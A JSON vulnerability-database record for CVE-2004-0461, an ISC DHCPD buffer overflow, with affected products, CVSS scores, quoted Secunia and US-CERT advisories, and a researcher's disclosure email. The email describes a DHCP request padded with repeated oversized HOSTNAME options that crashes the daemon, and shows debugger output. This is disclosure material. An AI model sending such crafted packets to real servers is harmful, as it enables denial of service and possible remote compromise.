"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "9.1"
},
{
"model": "linux mandrake",
"scope": "eq",
"trust": 0.3,
"vendor": "mandriva",
"version": "9.0"
},
{
"model": "dhcpd rc13",
"scope": "eq",
"trust": 0.3,
"vendor": "isc",
"version": "3.0.1"
},
{
"model": "dhcpd rc12",
"scope": "eq",
"trust": 0.3,
"vendor": "isc",
"version": "3.0.1"
},
{
"model": "dns one appliance .0-8a",
"scope": "eq",
"trust": 0.3,
"vendor": "infoblox",
"version": "2.4"
},
{
"model": "dns one appliance",
"scope": "eq",
"trust": 0.3,
"vendor": "infoblox",
"version": "2.4.0-8"
},
{
"model": "dns one appliance -r5",
"scope": "eq",
"trust": 0.3,
"vendor": "infoblox",
"version": "2.3.1"
},
{
"model": "dhcpd rc14",
"scope": "ne",
"trust": 0.3,
"vendor": "isc",
"version": "3.0.1"
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#317350"
},
{
"db": "CERT/CC",
"id": "VU#654390"
},
{
"db": "BID",
"id": "10591"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000617"
},
{
"db": "NVD",
"id": "CVE-2004-0461"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-117"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:infoblox:dns_one_appliance:2.4.0.8a:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:infoblox:dns_one_appliance:2.3.1_r5:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:h:infoblox:dns_one_appliance:2.4.0.8:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:a:suse:suse_email_server:iii:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:suse:suse_linux_admin-cd_for_firewall:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:suse:suse_linux_firewall_cd:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:suse:suse_linux_office_server:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:isc:dhcpd:3.0.1:rc12:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:isc:dhcpd:3.0.1:rc13:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:suse:suse_linux_connectivity_server:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:a:suse:suse_linux_database_server:*:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.0:*:amd64:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.0:*:i386:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.2:*:amd64:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:redhat:fedora_core:core_2.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.0:*:x86_64:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:10.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:7:*:enterprise_server:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.0:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:9.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.1:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:mandrakesoft:mandrake_linux:9.1:*:ppc:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:8.2:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:suse:suse_linux:8:*:enterprise_server:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2004-0461"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Gregory Duchemin\u203b c3rb3r@hotmail.com\u203bSolar Designer\u203b solar@openwall.com",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-200408-117"
}
],
"trust": 0.6
},
"cve": "CVE-2004-0461",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"obtainAllPrivilege": true,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "HIGH",
"trust": 1.0,
"userInteractionRequired": false,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Low",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "Complete",
"baseScore": 10.0,
"confidentialityImpact": "Complete",
"exploitabilityScore": null,
"id": "CVE-2004-0461",
"impactScore": null,
"integrityImpact": "Complete",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "High",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "COMPLETE",
"baseScore": 10.0,
"confidentialityImpact": "COMPLETE",
"exploitabilityScore": 10.0,
"id": "VHN-8891",
"impactScore": 10.0,
"integrityImpact": "COMPLETE",
"severity": "HIGH",
"trust": 0.1,
"vectorString": "AV:N/AC:L/AU:N/C:C/I:C/A:C",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "NVD",
"id": "CVE-2004-0461",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#317350",
"trust": 0.8,
"value": "25.52"
},
{
"author": "CARNEGIE MELLON",
"id": "VU#654390",
"trust": 0.8,
"value": "14.21"
},
{
"author": "CNNVD",
"id": "CNNVD-200408-117",
"trust": 0.6,
"value": "CRITICAL"
},
{
"author": "VULHUB",
"id": "VHN-8891",
"trust": 0.1,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "CERT/CC",
"id": "VU#317350"
},
{
"db": "CERT/CC",
"id": "VU#654390"
},
{
"db": "VULHUB",
"id": "VHN-8891"
},
{
"db": "JVNDB",
"id": "JVNDB-2004-000617"
},
{
"db": "NVD",
"id": "CVE-2004-0461"
},
{
"db": "CNNVD",
"id": "CNNVD-200408-117"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The DHCP daemon (DHCPD) for ISC DHCP 3.0.1rc12 and 3.0.1rc13, when compiled in environments that do not provide the vsnprintf function, uses C include files that define vsnprintf to use the less safe vsprintf function, which can lead to buffer overflow vulnerabilities that enable a denial of service (server crash) and possibly execute arbitrary code. The Internet Systems Consortium\u0027s (ISC) Dynamic Host Configuration Protocol (DHCP) 3 application contains a buffer overflow vulnerability. As a result, you may gain administrative privileges on vulnerable systems. \nOn systems which lack the vsnprintf() library call, ISC DHCPD defines vsnprintf as:\n#define vsnprintf(buf, size, fmt, list) vsprintf (buf, fmt, list)\nThis definition discards the size argument to the function, potentially allowing any occurrence of vsnprintf() to be exploitable, by overflowing whatever intended buffer is passed to the library call. \nOther locations in DHCPD utilizing this function may be exploitable. \nThis issue is reported to affect ISC DHCPD versions 3.0.1rc12 and 3.0.1rc13. ISC DHCP calls vsnprintf() to write format log file strings. \n\n----------------------------------------------------------------------\n\nSecunia is proud to announce the availability of the Secunia Software\nInspector. \n\nThe Secunia Software Inspector is a free service that detects insecure\nversions of software that you may have installed in your system. When\ninsecure versions are detected, the Secunia Software Inspector also\nprovides thorough guidelines for updating the software to the latest\nsecure version from the vendor. \n\nTry it out online:\nhttp://secunia.com/software_inspector/\n\n----------------------------------------------------------------------\n\nTITLE:\nXEROX WorkCentre Products Multiple Vulnerabilities\n\nSECUNIA ADVISORY ID:\nSA23265\n\nVERIFY ADVISORY:\nhttp://secunia.com/advisories/23265/\n\nCRITICAL:\nModerately critical\n\nIMPACT:\nSecurity Bypass, Manipulation of data, Exposure of system\ninformation, Exposure of sensitive information, DoS, System access\n\nWHERE:\n\u003eFrom local network\n\nOPERATING SYSTEM:\nXerox WorkCentre\nhttp://secunia.com/product/4746/\nXerox WorkCentre Pro\nhttp://secunia.com/product/4553/\n\nDESCRIPTION:\nSome vulnerabilities and weaknesses have been reported in various\nXEROX WorkCentre products, which can be exploited by malicious people\nto bypass certain security restrictions, expose certain sensitive\ninformation, cause a DoS (Denial of Service), and compromise a\nvulnerable system. \n\n1) Input passed to the TCP/IP hostname, the Scan-to-mailbox folder\nname field, and to the Microsoft Network configuration parameters in\nthe Web User interface is not properly sanitised. \n\n2) Certain browser settings may allow unauthorized access. \nAdditionally, an unspecified vulnerability in the Web User Interface\ncan be exploited to bypass the authentication. \n\n3) The TFTP/BOOTP auto configuration can be exploited to manipulate\ncertain configuration settings. \n\n4) An unspecified error within the handling of email signatures can\nbe exploited to display improper items. \n\n5) Requests to web services can be made through HTTP instead of\nHTTPS. Other unspecified HTTP security issues and a httpd.conf\nmisconfiguration are also reported. \n\n6) An error within the Scan-to-mailbox feature can be exploited to\nanonymously download secure files. Additionally, it is possible to\nanonymously download audit log files. \n\n7) The system fails to keep accurate time resulting in incorrect time\nstamps in audit logs. \n\n8) The embedded Samba version contains various vulnerabilities. \nAdditionally, the SMB \"Homes\" share is visible and it\u0027s possible to\nbrowse the file system via SMB. \n\n9) The SNMP agent does not return errors for non-writable objects. \nAdditionally, authentication failure traps can\u0027t be enabled or\ngenerated. \n\n10) An error within ops3-dmn can be exploited to crash the service\nand cause a DoS by attaching a PS script. \n\n11) It is possible to bypass the security restriction and boot\nAlchemy by e.g. using an USB thumb drive. \n\n12) The \"Validate Repository SSL Certificate\" scan feature does not\nverify the FQDN. \n\n13) Certain problems with the Immediate Image Overwrite and On Demand\nImage Overwrite, a Postgress port block, and a http TRACE XSS attack\nin the network controller are reported. \n\n14) Two boundary errors within the embedded DHCP implementation can\nbe exploited to cause a buffer overflow, which may allow execution of\narbitrary code. \n\nSOLUTION:\nApply updated software (see vendor advisories for detailed\ninstructions). \n\nPROVIDED AND/OR DISCOVERED BY:\nReported by the vendor. \n\nORIGINAL ADVISORY:\nXerox:\nhttp://www.xerox.com/downloads/usa/en/c/cert_XRX06_006_v1b.pdf\nhttp://www.xerox.com/downloads/usa/en/c/cert_XRX06_004_v11.pdf\n\n----------------------------------------------------------------------\n\nAbout:\nThis Advisory was delivered by Secunia as a free service to help\neverybody keeping their systems up to date against the latest\nvulnerabilities. \n\nSubscribe:\nhttp://secunia.com/secunia_security_advisories/\n\nDefinitions: (Criticality, Where etc.)\nhttp://secunia.com/about_secunia_advisories/\n\n\nPlease Note:\nSecunia recommends that you verify all advisories you receive by\nclicking the link. \nSecunia NEVER sends attached files with advisories. \nSecunia does not advise people to install third party patches, only\nuse those supplied by the vendor. \n\n----------------------------------------------------------------------\n\nUnsubscribe: Secunia Security Advisories\nhttp://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org\n\n----------------------------------------------------------------------\n\n\n. \n-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA1\n\n\n Technical Cyber Security Alert TA04-174A\n Multiple Vulnerabilities in ISC DHCP 3\n\n Original release date: June 22, 2004\n Last revised: --\n Source: US-CERT\n\nSystems Affected\n\n * ISC DHCP versions 3.0.1rc12 and 3.0.1rc13\n\nOverview\n\n Two vulnerabilities in the ISC DHCP allow a remote attacker to cause a\n denial of the DHCP service on a vulnerable system. It may be possible\n to exploit these vulnerabilities to execute arbitrary code on the\n system. \n\nI. \n\n VU#317350 discusses a buffer overflow vulnerability in the temporary\n storage of log lines. In transactions, ISC DHCPD logs every DHCP\n packet along with several pieces of descriptive information. The\n client\u0027s DISCOVER and the resulting OFFER, REQUEST, ACK, and NAKs are\n all logged. In all of these messages, if the client supplied a\n hostname, then it is also included in the logged line. As part of the\n DHCP datagram format, a client may specify multiple hostname options,\n up to 255 bytes per option. These options are concatenated by the\n server. If the hostname and options contain only ASCII characters,\n then the string will pass non-ASCII character filters and be\n temporarily stored in 1024 byte fixed-length buffers on the stack. If\n a client supplies enough hostname options, it is possible to overflow\n the fixed-length buffer. \n\n VU#654390 discusses C include files for systems that do not support\n the bounds checking vsnprintf() function. These files define the\n bounds checking vsnprintf() to the non-bounds checking vsprintf()\n function. Since vsprintf() is a function that does not check bounds,\n the size is discarded, creating the potential for a buffer overflow\n when client data is supplied. Note that the vsnprintf() statements are\n defined after the vulnerable code that is discussed in VU#317350. \n Since the preconditions for this vulnerability are similar to those\n required to exploit VU#317350, these buffer overflow conditions occur\n sequentially in the code after the buffer overflow vulnerability\n discussed in VU#317350, and these issues were discovered and resolved\n at the same time, there is no known exploit path to exploit these\n buffer overflow conditions caused by VU#654390. Note that VU#654390\n was discovered and exploitable once VU#317350 was resolved. \n\n For both of the vulnerabilities, only ISC DHCP 3.0.1rc12 and ISC DHCP\n 3.0.1rc13 are believed to be vulnerable. VU#317350 is exploitable for\n all operating systems and configurations. VU#654390 is only defined\n for the following operating systems:\n\n * AIX\n * AlphaOS\n * Cygwin32\n * HP-UX\n * Irix\n * Linux\n * NextStep\n * SCO\n * SunOS 4\n * SunOS 5.5\n * Ultrix\n\n All versions of ISC DCHP 3, including all snapshots, betas, and\n release candidates, contain the flawed code. \n\n US-CERT is tracking these issues as VU#317350, which has been assigned\n CVE CAN-2004-0460, and VU#654390, which has been assigned CVE\n CAN-2004-0461. \n\nII. \n\nIII. Solution\n\n Apply patches or upgrade\n\n These issues have been resolved in ISC DHCP 3.0.1rc14. Your vendor may\n provide specific patches or updates. For vendor-specific information,\n please see your vendor\u0027s site, or look for your vendor infomation in\n VU#317350 and VU#654390. As vendors report new information to US-CERT,\n we will update the vulnerability notes. \n\nAppendix B. References\n\n * http://www.isc.org/sw/dhcp/\n * http://www.kb.cert.org/vuls/id/317350\n * http://www.kb.cert.org/vuls/id/654390\n _________________________________________________________________\n\n US-CERT thanks Gregory Duchemin and Solar Designer for discovering,\n reporting, and resolving this vulnerability. Thanks also to David\n Hankins of ISC for notifying us of this vulnerability and the\n technical information provided to create this document. \n _________________________________________________________________\n\n Feedback can be directed to the author: Jason A. Rafail\n _________________________________________________________________\n\n The latest version of this document can be found at:\n \n \u003chttp://www.us-cert.gov/cas/techalerts/TA04-174A.html\u003e\n _________________________________________________________________\n \n Copyright 2004 Carnegie Mellon University. \n \n Terms of use:\n \n \u003chttp://www.us-cert.gov/legal.html\u003e\n \n _________________________________________________________________\n\n Revision History\n\n June 22, 2004: Initial release\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.2.1 (GNU/Linux)\n\niD8DBQFA2HFSXlvNRxAkFWARArH4AKDtUECQTE5HXmvsDQkwcWn9r7uAowCdGTHq\nAqWt3CgdEPJcIFDbJlIWQHo=\n=HSxN\n-----END PGP SIGNATURE-----\n. Hi,\nfor those interested to reproduce the recent DOS attacks against ISC \nDHCPD 3.0.1 rc12 and rc13\nas described in:\nhttp://www.kb.cert.org/vuls/id/317350\n, i\u0027m forwarding the first email i sent to ISC describing several stack \nbased buffer overflows occuring during the creation\nof log messages and triggered by sending several DHCP HOSTNAME options \nwithin a single request. \nThis mail also includes a trace of such DHCP REQUEST. \n\nOther .bss overflows related to vsnprintf and identified later during \nour investigations as described in:\nhttp://www.kb.cert.org/vuls/id/654390\ncan be triggered the exact same way. \nNote that the home made tool i am referencing in this email will be made \navailable very soon and already includes ISC, INFOBLOX and DLINK dhcp \nvulnerabilities\nI will drop a note here when it is finally released. \ncheers,\nGregory\n\nSpecial thanks to Solar Designer and David W.Hankins (ISC)\n\n\n--- Original email ------\n\nSummary:\n\ni have discovered several stack based overflow in your dhcp-3.0.1rc12 \nand rc13 (may be others, have not checked)\nthese vulnerabilities can be easily triggered by crafting a dhcp \ndiscover or request packet which carries several hostname dhcp options that\n,once reassembled by the daemon (as explained in rfc 3396), overflow a \nstack based variable causing the daemon to crash. \nI believe than one might execute code remotely on the server with the \nsame user account dhcpd is running with, root in most cases. \nI have been able at some points during the tests, to control eip\u0027 4 \nbytes (intel 32bits arch), it was during the ddns forward update operation. \nNote that all tests have been made on a linux 2.4.20-24.9 using a home \nmade tool to generate custom dhcp traffic\n\nNow an example:\n\nsee dhcpd.conf in attachment if you need it. \n\nstructure of an offending packet (case of a dhcp request based attack)\n\n \u003e\u003e DHCP request\n \u003e\u003e from 0.0.0.0:68 (ff:ff:ff:ff:ff:ff) to 255.255.255.255:67 \n(ff:ff:ff:ff:ff:ff)\n\n \u003e\u003e op : BOOT REQUEST (1)\n \u003e\u003e htype : Ethernet (10Mb) (1)\n \u003e\u003e hlen : 6\n \u003e\u003e hops : 0\n \u003e\u003e xid : 0x00000000\n \u003e\u003e secs : 1\n \u003e\u003e flags : UNICAST (0x0000)\n \u003e\u003e ciaddr : 0.0.0.0\n \u003e\u003e yiaddr : 0.0.0.0\n \u003e\u003e siaddr : 255.255.255.255\n \u003e\u003e giaddr : 0.0.0.0\n \u003e\u003e chaddr : ff:ff:ff:ff:ff:ff\n \u003e\u003e sname :\n \u003e\u003e file :\n \u003e\u003e cookie : 0x63825363 (RFC 1497/2132, BOOTP Vendor informations/DHCP \noptions)\n \u003e\u003e DHCP option (053 [0x35]) : MESSAGE_TYPE : REQUEST\n \u003e\u003e BOOTP option (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e BOOTP option (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e BOOTP option (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e BOOTP option (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e BOOTP option (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e BOOTP option (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e BOOTP option (012 [0x0c]) : HOSTNAME : \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n \u003e\u003e DHCP option (050 [0x32]) : REQUEST_IP : 192.168.0.99\n \nsending this packet to the ptraced daemon (within gdb) gives:\n\n(gdb) run -f -d\nThe program being debugged has been started already. \nStart it from the beginning? (y or n) y\nStarting program: /usr/sbin/dhcpd -f -d\nInternet Software Consortium DHCP Server V3.0.1rc13\nCopyright 1995-2003 Internet Software Consortium. \nAll rights reserved. \nFor info, please visit http://www.isc.org/products/DHCP\nWrote 0 deleted host decls to leases file. \nWrote 0 new dynamic host decls to leases file. \nWrote 0 leases to leases file. \nListening on LPF/eth0/00:0d:88:b5:95:0c/192.168.0.0/24\nSending on LPF/eth0/00:0d:88:b5:95:0c/192.168.0.0/24\nSending on Socket/fallback/fallback-net\nUnable to add forward map from \nbobAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA \nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-1022AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8 \n860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-284AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NANAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1.92E302E383631P-108NAN0X1.1E4600811E4FP-894AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.zob.com.0X1.D8860BFFFDD5P-895NAN0X0.0000080FFFFFFP-10220X1.1E46000000003P-8940X1.23931P-2840X1. 